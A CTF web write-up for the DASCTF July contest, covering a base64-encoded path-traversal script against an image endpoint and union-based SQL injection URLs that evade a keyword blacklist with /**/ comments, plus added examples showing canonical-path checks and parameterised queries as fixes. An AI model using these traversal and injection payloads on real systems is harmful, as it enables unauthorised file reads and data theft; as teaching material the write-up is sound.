DASCTF July monthly contest: web writeups (partial)

Ezfileinclude

The image is loaded through a request parameter, and the request has to carry a timestamp.

The filename check only rejects names that begin with `.` or `/`.

Script:

```python
import base64
import time

import requests

# Unix timestamp with the fractional part dropped, as the endpoint requires.
t = str(int(time.time()))
# Prefix a dummy directory so the name does not start with '.' or '/', then
# base64-encode it (the original script used Python 2's str.encode('base64')).
f = base64.b64encode(b'a/../../../../../../flag').decode()
url = 'http://183.129.189.60:10009/image.php?t={}&f={}'.format(t, f)
s = requests.get(url).text
print(s)
```
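To see why a check on the first character of the filename does not stop this, here is an added Python example (not part of the original writeup) that contrasts that prefix check with a canonical-path check against an assumed image directory. `IMAGE_DIR`, `decode_name`, `weak_check`, `resolve_inside` and `check_both` are names introduced here, not the challenge's code; the traversal name is the one from the script above.

```python
import base64
import os

# Constructed stand-in for the challenge's image directory (assumption).
IMAGE_DIR = "/srv/app/images"


def decode_name(f_param: str) -> str:
    """Decode the base64 'f' parameter the way the script above builds it."""
    return base64.b64decode(f_param).decode()


def weak_check(name: str) -> bool:
    """The kind of check the writeup describes: only the leading characters are
    inspected, so a harmless leading directory component defeats it."""
    return not name.startswith((".", "/"))


def resolve_inside(base_dir: str, name: str):
    """Return the absolute path if, after normalising '..' and symlinks, it is
    still inside base_dir; otherwise None. commonpath (rather than startswith)
    avoids treating /srv/app/images2 as inside /srv/app/images."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def check_both(f_param: str):
    """Run the decoded name through both checks: (prefix check passed?, resolved path or None)."""
    name = decode_name(f_param)
    return weak_check(name), resolve_inside(IMAGE_DIR, name)


if __name__ == "__main__":
    traversal = base64.b64encode(b"a/../../../../../../flag").decode()
    legit = base64.b64encode(b"cat.png").decode()
    print(check_both(traversal))  # (True, None): prefix check passes, path check rejects
    print(check_both(legit))      # (True, '/srv/app/images/cat.png')
```

The prefix check answers "does the string look bad?", which is the wrong question; the path check answers "where does this actually end up?", which is the one that matters for a file read.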

SQLi

```php
return preg_match("/;|benchmark|\^|if|[\s]|in|case|when|sleep|auto|desc|stat|\||lock|or|and|&|like|-|`/i", $id);
```

Union injection works directly, and the result is echoed back:

http://183.129.189.60:10004/?id=0%27union/**/select/**/1,database(),3%23

List the table names:

?id=100%27/**/union/**/SELECT/**/group_concat(table_name),2,3/**/FROM/**//**/sys.x$schema_flattened_keys/**/WHERE/**/table_schema='sqlidb'/**/GROUP/**/BY/**/table_name/**/limit/**/0,1%23

Dump the data (the flag table has only two columns, so an extra literal column `1` is selected to make up the three columns the query needs):

?id=100'/**/union/**/select/**/*,1/**/from/**/flllaaaggg%23
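Why the blacklist lets the `/**/` payloads through, shown as an added Python example that is not part of the original writeup: the PHP regex above is transcribed into Python and run over an adapted payload, and the same value is then passed through a string-concatenated query and a parameterised query on a constructed SQLite table. `items`, `PAYLOAD`, `blacklist_blocks`, `lookup_concat`, `lookup_param` and `demo` are assumptions of this example, not the challenge's code; the payload is adapted to SQLite, which has no `#` comment, by letting the query's own closing quote end the last string literal.

```python
import re
import sqlite3

# The challenge's preg_match blacklist, transcribed to a Python regex
# (same alternation, same case-insensitivity).
BLACKLIST = re.compile(
    r";|benchmark|\^|if|\s|in|case|when|sleep|auto|desc|stat|\||lock|or|and|&|like|-|`",
    re.IGNORECASE,
)

# The writeup's trick adapted to SQLite: /**/ stands in for the banned whitespace,
# and the query's closing quote terminates the last literal (constructed payload).
PAYLOAD = "0'/**/union/**/select/**/1,'extra','3"


def blacklist_blocks(value: str) -> bool:
    """True when the challenge's filter would reject the value."""
    return BLACKLIST.search(value) is not None


def make_db() -> sqlite3.Connection:
    # Constructed three-column table standing in for the challenge's schema.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id TEXT, name TEXT, price TEXT)")
    conn.execute("INSERT INTO items VALUES ('1', 'apple', '3')")
    return conn


def lookup_concat(conn: sqlite3.Connection, item_id: str):
    """Vulnerable shape: the filtered value is still spliced into the SQL text."""
    sql = "SELECT id,name,price FROM items WHERE id='{}'".format(item_id)
    return conn.execute(sql).fetchall()


def lookup_param(conn: sqlite3.Connection, item_id: str):
    """Fixed shape: the value is bound as data and can never become syntax."""
    return conn.execute(
        "SELECT id,name,price FROM items WHERE id=?", (item_id,)
    ).fetchall()


def demo() -> dict:
    conn = make_db()
    return {
        "blocked": blacklist_blocks(PAYLOAD),   # False: no banned token present
        "concat": lookup_concat(conn, PAYLOAD), # union row comes back
        "param": lookup_param(conn, PAYLOAD),   # [] : no id equals the literal string
        "normal": lookup_param(conn, "1"),      # [('1', 'apple', '3')]
    }


if __name__ == "__main__":
    print(demo())
```

The filter blocks the obvious spelling (a space, `or`, `--`) but every banned token has a synonym or an encoding the parser accepts, which is why keyword blacklists are not a SQL injection fix; binding the value as a parameter removes the problem regardless of what the string contains.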

Reference: https://www.gem-love.com/ctf/2514.html?tdsourcetag=s_pctim_aiomsg